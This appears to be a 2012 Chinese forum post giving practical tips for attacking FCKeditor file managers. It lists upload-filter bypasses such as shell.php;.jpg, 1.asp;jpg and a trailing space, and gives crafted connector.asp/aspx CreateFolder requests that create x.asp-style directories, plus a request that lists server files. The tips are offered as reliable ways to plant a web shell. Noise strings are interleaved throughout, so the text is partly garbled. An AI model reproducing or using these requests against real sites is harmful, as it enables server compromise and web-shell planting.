很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg8 k+ w m( g5 a2 \0 \4 \3 K
: U* b. [7 j% d! [
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
' X' ^; S2 w7 c* u+ ~0 R7 Q! \( N" U2 `4 Z/ t% J$ H, w/ I
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
3 o/ Q0 L; P* R& }: s0 ?
. r0 Y0 ?" W4 s9 y* P( z9 ~突破建立文件夹:8 o, J% |- U4 ]- h. V! j
1 ~" A p' m, S* N8 }editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
4 R5 c$ I5 S, G# n+ o7 S
: A3 j; n p8 O' `; V9 }5 V参数:
# g! Y% f( }, A/ W- W+ n4 I
, V4 f. U. g: o. `1 B当前目录名:CurrentFolder=/qing.asp
; S. H* m6 }5 \% \1 T. v9 m! b. J$ x2 e5 e# B
新的目录名:NewFolderName=x.asp
5 H( v& x2 J1 R# K
0 ?- D2 R6 D5 C. [7 ~, I其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
6 p4 [7 R9 E$ p: L. U+ G7 I" o) ^; t9 V* a, |- H9 Y1 s
那么 x.asp 就已经建立生成了,此方法百试百灵!
0 v" P6 O: a/ O, s' l1 U4 ~: s3 E# A" r4 t4 ?0 u
新建文件夹参数 x.asp,基本都能搞定。- f5 e& i4 S6 \# S9 [% {
+ ]5 H2 j0 m# a0 @! p
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建+ b( @+ s: U- ]9 o2 Y* ~
% ?, n# ?# a, f& Y% easpx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp- w2 x7 A' G3 |
9 Z+ |+ M% h6 j% m7 e& M& }获取文件列表
! x1 ^, ~" \/ L, c8 J. s* c aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
* R% V! D4 ? o& K/ X+ S. `: O& z& y3 w' n5 T* r0 O
|
发表于 2012-12-31 09:27:09
收藏
支持
反对